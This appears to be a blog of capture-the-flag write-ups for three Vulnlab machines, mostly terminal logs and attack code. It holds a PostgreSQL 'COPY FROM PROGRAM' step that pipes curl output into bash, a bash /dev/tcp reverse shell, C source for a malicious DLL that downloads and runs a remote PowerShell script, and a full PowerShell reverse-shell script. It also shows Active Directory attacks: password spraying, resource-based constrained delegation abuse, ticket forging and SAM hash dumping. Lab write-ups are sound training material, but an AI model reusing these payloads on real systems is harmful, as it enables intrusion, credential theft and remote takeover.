                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2/extract2/home]
└─$ sudo su 1337             
$ bash
1337@kali:/home/puck/vulnlab/slonik2/extract2/home$ ls -la
total 12
drwxr-xr-x  3 root root 4096 Oct 24  2023 .
drwxr-xr-x 19 root root 4096 Jul 27 09:22 ..
drwxr-x---  5 1337 1337 4096 Oct 24  2023 service
1337@kali:/home/puck/vulnlab/slonik2/extract2/home$ cd service
1337@kali:/home/puck/vulnlab/slonik2/extract2/home/service$ ls -la
total 40
drwxr-x--- 5 1337 1337 4096 Oct 24  2023 .
drwxr-xr-x 3 root root 4096 Oct 24  2023 ..
-rw-rw-r-- 1 1337 1337   90 Oct 24  2023 .bash_history
-rw-r--r-- 1 1337 1337  220 Oct 24  2023 .bash_logout
-rw-r--r-- 1 1337 1337 3771 Oct 24  2023 .bashrc
drwx------ 2 1337 1337 4096 Oct 24  2023 .cache
drwxrwxr-x 3 1337 1337 4096 Oct 24  2023 .local
-rw-r--r-- 1 1337 1337  807 Oct 24  2023 .profile
-rw------- 1 1337 1337  326 Oct 24  2023 .psql_history
drwxrwxr-x 2 1337 1337 4096 Oct 24  2023 .ssh
1337@kali:/home/puck/vulnlab/slonik2/extract2/home/service$ cat .psql_history
CREATE DATABASE service;
\c service;
CREATE TABLE users ( id SERIAL PRIMARY KEY, username VARCHAR(255) NOT NULL, password VARCHAR(255) NOT NULL, description TEXT);
INSERT INTO users (username, password, description)VALUES ('service', 'aa<redacted>c2'WHERE', network access account');
select * from users;
\q
1337@kali:/home/puck/vulnlab/slonik2/extract2/home/service$ cat .bash_history
ls -lah /var/run/postgresql/
file /var/run/postgresql/.s.PGSQL.5432
psql -U postgres
exit
1337@kali:/home/puck/vulnlab/slonik2/extract2/home/service$

.

crack the hash

┌──(puck㉿kali)-[~/vulnlab/slonik2]
└─$ john hash --format=RAW-MD5
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=8
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
se<redacted>ce          (?)     
1g 0:00:00:00 DONE 2/3 (2024-07-27 09:48) 50.00g/s 19200p/s 19200c/s 19200C/s 123456..larry
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed. 

ssh connects but immediately disconnects

┌──(puck㉿kali)-[~/vulnlab/slonik2]
└─$ ssh service@10.10.99.219              
The authenticity of host '10.10.99.219 (10.10.99.219)' can't be established.
ED25519 key fingerprint is SHA256:j/hcANass/0veF/m0NAMOR41osL5zUMMMQ9nCYiwjmY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.99.219' (ED25519) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@/     %@@@@@@@@@@.      @&             @@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@   ############.    ############   ##########*  &@@@@@@@@@@@@@@@ 
@@@@@@@@@@@  ###############  ###################  /##########  @@@@@@@@@@@@@ 
@@@@@@@@@@ ###############( #######################(  #########  @@@@@@@@@@@@ 
@@@@@@@@@  ############### (#########################  ######### @@@@@@@@@@@@ 
@@@@@@@@@ .##############  ###########################( #######  @@@@@@@@@@@@ 
@@@@@@@@@  ############## (        ##############        ######  @@@@@@@@@@@@ 
@@@@@@@@@. ############## #####   # .########### ##  ##  #####. @@@@@@@@@@@@@ 
@@@@@@@@@@ .############# /########  ########### *##### ###### @@@@@@@@@@@@@@ 
@@@@@@@@@@. ############# (########( ###########/ ##### ##### (@@@@@@@@@@@@@@ 
@@@@@@@@@@@  ###########( #########, ############( ####  ### (@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@ (##########/ #########  ##############  ##  #( @@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@( ###########  #######  ################  / #  @@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@  ############  ####  ###################    @@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@, ##########  @@@      ################            (@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@ .######  @@@@   ###  ##############  #######   @@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@(  *   @. #######    ############## (@((&@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%&@@@@  #############( @@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  #############  @@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@/ ############# ,@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ############( @@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  ###########  @@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  #######*  @@@@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&   @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 
(service@10.10.99.219) Password: 
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 6.2.0-1014-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Jul 27 07:50:05 UTC 2024

  System load:  0.21142578125     Processes:             122
  Usage of /:   32.1% of 7.57GB   Users logged in:       0
  Memory usage: 23%               IPv4 address for ens5: 10.10.99.219
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Oct 24 13:11:33 2023 from 10.10.1.254
Connection to 10.10.99.219 closed.

.

We have to do a trick

┌──(puck㉿kali)-[~/vulnlab/slonik2]
└─$ ssh -N -L /tmp/.s.PGSQL.5433:/var/run/postgresql/.s.PGSQL.5432 service@10.10.99.219         
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@/     %@@@@@@@@@@.      @&             @@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@   ############.    ############   ##########*  &@@@@@@@@@@@@@@@ 
@@@@@@@@@@@  ###############  ###################  /##########  @@@@@@@@@@@@@ 
@@@@@@@@@@ ###############( #######################(  #########  @@@@@@@@@@@@ 
@@@@@@@@@  ############### (#########################  ######### @@@@@@@@@@@@ 
@@@@@@@@@ .##############  ###########################( #######  @@@@@@@@@@@@ 
@@@@@@@@@  ############## (        ##############        ######  @@@@@@@@@@@@ 
@@@@@@@@@. ############## #####   # .########### ##  ##  #####. @@@@@@@@@@@@@ 
@@@@@@@@@@ .############# /########  ########### *##### ###### @@@@@@@@@@@@@@ 
@@@@@@@@@@. ############# (########( ###########/ ##### ##### (@@@@@@@@@@@@@@ 
@@@@@@@@@@@  ###########( #########, ############( ####  ### (@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@ (##########/ #########  ##############  ##  #( @@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@( ###########  #######  ################  / #  @@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@  ############  ####  ###################    @@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@, ##########  @@@      ################            (@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@ .######  @@@@   ###  ##############  #######   @@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@(  *   @. #######    ############## (@((&@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%&@@@@  #############( @@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  #############  @@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@/ ############# ,@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ############( @@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  ###########  @@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  #######*  @@@@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&   @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 
(service@10.10.99.219) Password: 

.

┌──(puck㉿kali)-[~/vulnlab/slonik]
└─$ psql -h /tmp -U postgres -p 5433
psql (15.3 (Debian 15.3-0+deb12u1), server 14.9 (Ubuntu 14.9-0ubuntu0.22.04.1))
Type "help" for help.

postgres=# \list
                                             List of databases
   Name    |  Owner   | Encoding | Collate |  Ctype  | ICU Locale | Locale Provider |   Access privileges   
-----------+----------+----------+---------+---------+------------+-----------------+-----------------------
 postgres  | postgres | UTF8     | C.UTF-8 | C.UTF-8 |            | libc            | 
 service   | postgres | UTF8     | C.UTF-8 | C.UTF-8 |            | libc            | 
 template0 | postgres | UTF8     | C.UTF-8 | C.UTF-8 |            | libc            | =c/postgres          +
           |          |          |         |         |            |                 | postgres=CTc/postgres
 template1 | postgres | UTF8     | C.UTF-8 | C.UTF-8 |            | libc            | =c/postgres          +
           |          |          |         |         |            |                 | postgres=CTc/postgres
(4 rows)

postgres=# DROP TABLE IF EXISTS cmd_exec;
NOTICE:  table "cmd_exec" does not exist, skipping
DROP TABLE
postgres=# CREATE TABLE cmd_exec(cmd_output text);
CREATE TABLE
postgres=# COPY cmd_exec FROM PROGRAM 'curl http://10.8.2.138/s | bash';

s contains

#!/bin/bash
bash -i >& /dev/tcp/10.8.2.138/443 0>&1

Privesc

postgres@slonik:/opt/backups/current$  python3 -c 'import pty;pty.spawn("/bin/bash")'
<nt$  python3 -c 'import pty;pty.spawn("/bin/bash")'
postgres@slonik:/opt/backups/current$ export TERM=xterm
export TERM=xterm
postgres@slonik:/opt/backups/current$ 
zsh: suspended  rlwrap nc -nlvp 443
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2]
└─$ stty raw -echo;fg
[1]  + continued  rlwrap nc -nlvp 443
postgres@slonik:/opt/backups/current$

.

postgres@slonik:/var/lib/postgresql/14/main$ chmod 777 pwn
chmod 777 pwn
postgres@slonik:/var/lib/postgresql/14/main$ chmod u+s pwn
chmod u+s pwn
postgres@slonik:/var/lib/postgresql/14/main$ ls -lah /opt/backups/current/
ls -lah /opt/backups/current/
total 3.0M
drwxr-xr-x 19 root root 4.0K Jul 27 08:26 .
drwxr-xr-x  3 root root 4.0K Oct 23  2023 ..
-rw-------  1 root root    3 Jul 27 08:26 PG_VERSION
..snip..
-rw-------  1 root root   88 Jul 27 08:26 postgresql.auto.conf
-rwxrwxrwx  1 root root 1.4M Jul 27 08:26 pwn

postgres@slonik:/var/lib/postgresql/14/main$ /opt/backups/current/pwn -p
/opt/backups/current/pwn -p
pwn-5.1# id    id
id
uid=115(postgres) gid=123(postgres) euid=0(root) groups=123(postgres),122(ssl-cert)
pwn-5.1# cd /rocd /root
cd /root
pwn-5.1# cat rocat root.txt
cat root.txt
VL{b0<redacted>fa}
pwn-5.1# 

 

vulnlab-phantom

vulnlab-phantom

a medium windows machine

┌──(puck㉿kali)-[~/vulnlab/phantom]
└─$ crackmapexec smb dc.phantom.vl -u 'guest' -p '' --shares     
SMB         dc.phantom.vl   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
SMB         dc.phantom.vl   445    DC               [+] phantom.vl\guest: 
SMB         dc.phantom.vl   445    DC               [+] Enumerated shares
SMB         dc.phantom.vl   445    DC               Share           Permissions     Remark
SMB         dc.phantom.vl   445    DC               -----           -----------     ------
SMB         dc.phantom.vl   445    DC               ADMIN$                          Remote Admin
SMB         dc.phantom.vl   445    DC               C$                              Default share
SMB         dc.phantom.vl   445    DC               Departments Share                 
SMB         dc.phantom.vl   445    DC               IPC$            READ            Remote IPC
SMB         dc.phantom.vl   445    DC               NETLOGON                        Logon server share 
SMB         dc.phantom.vl   445    DC               Public          READ            
SMB         dc.phantom.vl   445    DC               SYSVOL                          Logon server share

.

crackmapexec smb dc.phantom.vl -u 'guest' -p '' --rid-brute 5000
cat userlist.txt| cut -d '\' -f2 | awk '{print $1}' | tee users.txt

.

smbclient -U 'guest\phantom.vl' //dc.phantom.vl/Public                                       

Password for [GUEST\phantom.vl]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Jul 11 17:03:14 2024
  ..                                DHS        0  Sun Jul  7 10:39:30 2024
  tech_support_email.eml              A    14565  Sat Jul  6 18:08:43 2024

        6127103 blocks of size 4096. 1181062 blocks available
smb: \> get tech_support_email.eml 
getting file \tech_support_email.eml of size 14565 as tech_support_email.eml (171.4 KiloBytes/sec) (average 171.4 KiloBytes/sec)
smb: \>

EML view gives

Welcome to Phantom!
Dear <NAME>
We are excited to have you on board.
Below are your user credentials:
Username: <USERNAME>
Password: Ph<redacted>t!
Please log in to your account using these credentials. For security reasons, we strongly
recommend that you change your password immediately after your first login.
If you have any questions or need assistance, feel free to reach out to our support team at
techsupport@phantom.vl
Best regards,
The Phant

.

crackmapexec smb dc.phantom.vl -u users.txt -p 'Ph<redacted>t!' --continue-on-success --no-bruteforce

hashcat to find pass for verasign file

hashcat -a 0 -m 13721 IT_BACKUP_201123.hc phantom.txt -r phantom.rule
crackmapexec smb dc.phantom.vl -u 'ibryant' -p 'Ph<redacted>t!' -M spider_plus 

found in backup file /opt/vyatta/config/tmp/new_config_5175/vpn/sstp/authentication/local-users/username/ lstanley gB<redacted>Rc

.

crackmapexec smb dc.phantom.vl -u users.txt -p gB<redacted>Rc --continue-on-success

.

crackmapexec winrm dc.phantom.vl -u svc_sspr -p gB<redacted>Rc
evil-winrm --ip phantom.vl -u 'svc_sspr' -p 'gB<redacted>Rc'
bloodhound-python -d phantom.vl -v --zip -c all -u 'svc_sspr' -p 'gB<redacted>Rc' -ns 10.10.115.252 --dns-tcp   

Here comes the fun

net rpc password "crose" "Summer2024" -U "phantom.vl"/"svc_sspr"%"gB<redacted>Rc" -S "phantom.vl"

.

crackmapexec ldap dc.phantom.vl -u crose -p Summer2024           
SMB         dc.phantom.vl   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
LDAP        dc.phantom.vl   389    DC               [+] phantom.vl\crose:Summer2024

.

crackmapexec ldap dc.phantom.vl -u crose -p Summer2024 -M maq
SMB         dc.phantom.vl   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
LDAP        dc.phantom.vl   389    DC               [+] phantom.vl\crose:Summer2024 
MAQ         dc.phantom.vl   389    DC               [*] Getting the MachineAccountQuota
MAQ         dc.phantom.vl   389    DC               MachineAccountQuota: 0

Let’s delegate

impacket-rbcd -delegate-from 'crose' -delegate-to 'DC$' -dc-ip '10.10.123.229' -action 'write' 'phantom.vl'/'crose':'Summer2024'        
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] crose can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     crose        (S-1-5-21-4029599044-1972224926-2225194048-1126)

export KRB5CCNAME=cross.ccache

over-pass-the-hash

impacket-getTGT -hashes :$(pypykatz crypto nt 'Summer2024') 'phantom.vl'/'crose'      
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Saving ticket in crose.ccache

export KRB5CCNAME=cross.ccache
python3 describeTicket.py crose.ccache | grep 'Ticket Session Key'
[*] Ticket Session Key            : 250eee68243a68044b984d8c79a35883
impacket-smbpasswd -newhashes :250eee68243a68044b984d8c79a35883 phantom.vl/crose:'Summer2024'@dc.phantom.vl 
 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

===============================================================================
  Warning: This functionality will be deprecated in the next Impacket version  
===============================================================================

[*] NTLM hashes were changed successfully.
impacket-rbcd -delegate-from 'crose' -delegate-to 'DC$' -dc-ip 10.10.123.229 -action 'write' 'phantom.vl'/'crose' -hashes :250eee68243a68044b984d8c79a35883
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Accounts allowed to act on behalf of other identity:
[*]     crose        (S-1-5-21-4029599044-1972224926-2225194048-1126)
[*] crose can already impersonate users on DC$ via S4U2Proxy
[*] Not modifying the delegation rights.
[*] Accounts allowed to act on behalf of other identity:
[*]     crose        (S-1-5-21-4029599044-1972224926-2225194048-1126)

export KRB5CCNAME=cross.ccache

.

impacket-getST -u2u -impersonate Administrator -spn 'cifs/dc.phantom.vl' -k -no-pass phantom.vl/'crose'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Impersonating Administrator
[*] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_dc.phantom.vl@PHANTOM.VL.ccache

export KRB5CCNAME=cAdministrator@cifs_dc.phantom.vl@PHANTOM.VL.ccache

.

impacket-secretsdump -k dc.phantom.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xa08cda6a38d423ba98b6f79cf6c7880f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8b<redacted>5d:::

.

evil-winrm --ip phantom.vl -u 'Administrator' -H '71<redacted>30'

That was fun.

vulnlab-push

vulnlab-push

a hard windows machine

preperation

create puck.c on kali box

puck.c contains:

#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
    switch(dwReason){
        case DLL_PROCESS_ATTACH:

            system("powershell IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('http://192.168.36.116:9000/puckshell.txt')))");


            break;
        case DLL_PROCESS_DETACH:
            break;
        case DLL_THREAD_ATTACH:
            break;
        case DLL_THREAD_DETACH:
            break;
    }
    return TRUE;
}

create malicious dll

puck@kali:~$ x86_64-w64-mingw32-gcc ./puck.c -shared -o puck.dll
puck@kali:~$ file puck.dll
puck.dll: PE32+ executable (DLL) (console) x86-64, for MS Windows

puckshell.txt contains:

function cleanup {
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
exit}
// Setup IPADDR
$address = '192.168.1.136'
// Setup PORT
$port = '443'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
if ($client.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
start-sleep 1
if ($process.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}

on attacker pc run http listener and nc listener

c:\PENTEST>python3 -m http.server 9000
Serving HTTP on :: port 9000 (http://[::]:9000/) ...
::ffff:192.168.36.91 - - [22/Jul/2024 10:49:46] "GET /puckshell.txt HTTP/1.1" 200 -
::ffff:192.168.36.91 - - [22/Jul/2024 10:50:32] "GET /puckshell.txt HTTP/1.1" 200 -
c:\PENTEST>nc64.exe -nlvp 443
listening on [any] 443 ...
connect to [192.168.36.116] from (UNKNOWN) [192.168.36.91] 58868
Microsoft Windows [Version 10.0.22631.3880]
(c) Microsoft Corporation. Alle rechten voorbehouden.

C:\Windows\System32>whoami
fakedomain\hillie

test on windows target with

rundll32.exe C:\Payloads\puck.dll,XYZ

If all tests are succesfull, we continue to the writeup.

Writeup :

To abuse clickonce we follow article , we need to upload our SelfService.dll.deploy , which will download and execute a reverse shell.

More to come …\

With shell as kelly.hill we find her credentials in her homefolder

evil-winrm --ip ms01.push.vl -u 'kelly.hill' -p 'Sh<redacted>!' 
xfreerdp  /u:kelly.hill /p:'Sh<redacted>!' /v:ms01.push.vl /cert:ignore /rfx

Bloodhound Analysis:

bloodhound-python -d push.vl -v --zip -c all -u 'olivia.wood' -p 'DeployTrust07' -ns 10.10.198.149 --dns-tcp

Check Machine Quota

crackmapexec ldap dc01.push.vl -u "Olivia.Wood" -p "DeployTrust07" -M maq

 

RBCD abuse

From bloodhound we see kelly.hill First Degree Object Control , has AllExtendedRights and WriteAccountRestrictions on MS01, which means that we can read all properties on MS01 and we can edit msDS-AllowedToActOnBehalfOfOtherIdentity to perform RBCD (Resource based constrained delegation) by having write account restrictions rights

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-addcomputer -method LDAPS -computer-name 'puckie' -computer-pass 'Summer2024!' -dc-host dc01.push.vl -domain-netbios push.vl 'push.vl/kelly.hill:Sh<redacted>i!'     
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Successfully added machine account puckie$ with password Summer2024!.
                                                                                                                                        
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-rbcd -delegate-from 'puckie$' -delegate-to 'MS01$' -action 'write' 'push.vl/kelly.hill:Sh<redacted>i!' 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Accounts allowed to act on behalf of other identity:
[*] Delegation rights modified successfully!
[*] puckie$ can now impersonate users on MS01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     puckie$      (S-1-5-21-1451457175-172047642-1427519037-3603)
                                                                                                                                        
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-getST -spn 'cifs/ms01.push.vl' -impersonate 'administrator' 'push.vl/puckie$:Summer2024!'  
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_ms01.push.vl@PUSH.VL.ccache
                                                                                                                                        
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ export KRB5CCNAME=administrator@cifs_ms01.push.vl@PUSH.VL.ccache            

                                                                                                                                        
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-secretsdump -k ms01.push.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x1a2f736cde34f0733b3cc6f7ec68c413
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d8<redacted>61:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d7da45674bae3a0476c0f64b67121f7d:::
[*] Dumping cached domain logon information (domain/username:hash)
PUSH.VL/Administrator:$DCC2$10240#Administrator#33<redacted>09: (2023-08-31 18:27:31)
PUSH.VL/Kelly.Hill:$DCC2$10240#Kelly.Hill#b0<redacted>29: (2023-09-02 11:17:04)
PUSH.VL/sccadmin:$DCC2$10240#sccadmin#0c<redacted>5c: (2023-08-31 10:26:08)

Now that we have the Administrator hash of ms01

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ evil-winrm --ip ms01.push.vl -u 'Administrator' -H 'd8<redacted>61'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\kelly.hill\documents> dir


    Directory: C:\Users\kelly.hill\documents


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         7/25/2024   7:39 AM        1125376 SharpSCCM.exe


*Evil-WinRM* PS C:\Users\kelly.hill\documents> .\SharpSCCM.exe local site-info

  _______ _     _ _______  ______  _____  _______ _______ _______ _______
  |______ |_____| |_____| |_____/ |_____] |______ |       |       |  |  |
  ______| |     | |     | |    \_ |       ______| |______ |______ |  |  |    @_Mayyhem

[+] Connecting to \\127.0.0.1\root\CCM
[+] Executing WQL query: SELECT Name,CurrentManagementPoint FROM SMS_Authority
-----------------------------------
SMS_Authority
-----------------------------------
CurrentManagementPoint: DC01.push.vl
Name: SMS:HQ0
-----------------------------------
[+] Completed execution in 00:00:00.2090991
*Evil-WinRM* PS C:\Users\kelly.hill\documents> 


.

┌──(sccmhunter)─(puck㉿kali)-[~/vulnlab/push/sccmhunter]
└─$ python3 sccmhunter.py find -u 'sccadmin' -p '7u<redacted>JM' -dc-ip 10.10.188.181 -d push.vl -ldaps 
SCCMHunter v1.0.5 by @garrfoster
[10:15:22] INFO     [*] Checking for System Management Container.                                                    
[10:15:22] INFO     [+] Found System Management Container. Parsing DACL.                                             
[10:15:22] INFO     [-] System Management Container not found.                                                       
[10:15:22] INFO     [*] Searching LDAP for anything containing the strings 'SCCM' or 'MECM'                          
[10:15:23] INFO     [-] No results found.                                                                            
                                                                                                                     
┌──(sccmhunter)─(puck㉿kali)-[~/vulnlab/push/sccmhunter]
┌──(sccmhunter)─(puck㉿kali)-[~/vulnlab/push/sccmhunter]
└─$ python3 sccmhunter.py smb -u 'sccadmin' -p '7u<redacted>JM' -dc-ip 10.10.188.181 -d push.vl -ldaps 
SCCMHunter v1.0.5 by @garrfoster
[10:17:30] INFO     [-] No SiteServers found in database.                                                            
[10:17:30] INFO     [-] No Management Points found in database.                                                      
[10:17:30] INFO     [-] No computers found in database.

I could not solve sccadmin exploit .

It should run like below , and giving the hash in responder

PS C:\Users\kelly.hill\Documents> .\SharpSCCM.exe invoke client-push -t 10.8.2.138 -mp DC01.push.vl -sc HQ0
.\SharpSCCM.exe invoke client-push -t 10.8.2.138 -mp DC01.push.vl -sc HQ0

  _______ _     _ _______  ______  _____  _______ _______ _______ _______
  |______ |_____| |_____| |_____/ |_____] |______ |       |       |  |  |
  ______| |     | |     | |    \_ |       ______| |______ |______ |  |  |    @_Mayyhem

[+] Created "ConfigMgr Client Messaging" certificate in memory for device registration and signing/encrypting subsequent messages
[+] Reusable Base64-encoded certificate:

    308209D20201033082098E06092A864886F70D010701A082097F0482097B308209773082059006092A864886F70D010701A00207D0

[+] Discovering local properties for client registration request
[+] Modifying client registration request properties:
      FQDN: 10.8.2.138
      NetBIOS name: 10.8.2.138
      Site code: HQ0
[+] Sending HTTP registration request to DC01.push.vl:80
[+] Received unique SMS client GUID for new device:

    GUID:7D070746-617E-4763-9835-F7811A6BED54

[+] Discovering local properties for DDR inventory report
[+] Modifying DDR and inventory report properties
[+] Discovered PlatformID: Microsoft Windows NT Advanced Server 10.0
[+] Modified PlatformID: Microsoft Windows NT Workstation 2010.0
[+] Sending DDR from GUID:7D070746-617E-4763-9835-F7811A6BED54 to MP_DdrEndpoint endpoint on DC01.push.vl:HQ0 and requesting client installation on 10.8.0.233
[+] Completed execution in 00:00:06.9340974

.

As we now have the pass of user sccadmin , we do a Golden Ticket attack

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ crackmapexec smb dc01.push.vl -u "sccadmin" -p "7u<redacted>JM"          
SMB         DC01.push.vl    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:push.vl) (signing:True) (SMBv1:False)
SMB         DC01.push.vl    445    DC01             [+] push.vl\sccadmin:7u<redacted>JM 

